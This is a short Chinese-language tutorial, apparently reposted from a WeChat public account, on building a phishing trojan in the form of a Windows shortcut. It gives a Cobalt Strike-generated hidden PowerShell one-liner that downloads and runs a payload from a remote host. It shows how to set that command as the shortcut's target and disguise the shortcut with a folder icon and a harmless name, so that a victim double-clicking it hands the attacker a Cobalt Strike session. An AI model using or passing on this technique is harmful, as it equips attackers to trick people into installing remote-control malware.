制作快捷方式钓鱼木马
用到的工具:
Cobalt Strike这个基础用法
我们基于kali的系统,首先打开我们的cs,进行基础配置(监听器之类)
然后我们生成一个链接
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"我们复制这个代码
第二步,我们到win10目标机器中,创建一个快捷方式
右击桌面选择快捷方式
找到windows中powershell的位置,正常的位置
C:\Windows\System32\WindowsPowerShell\v1.0
然后我们将power shell的位置和上面的木马链接拼接起来
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"
然后我们下一步,命名去掉exe,自己看着伪装
我们还需要更改下图标
右击选择属性
然后我们换一个文件夹的图标,地址在
%SystemRoot%\System32\shell32.dll
点一下确定就会出现这么多,我们根据自己的伪装需要来选择
我们双击打开,kali中的cs很快上线
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-28,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
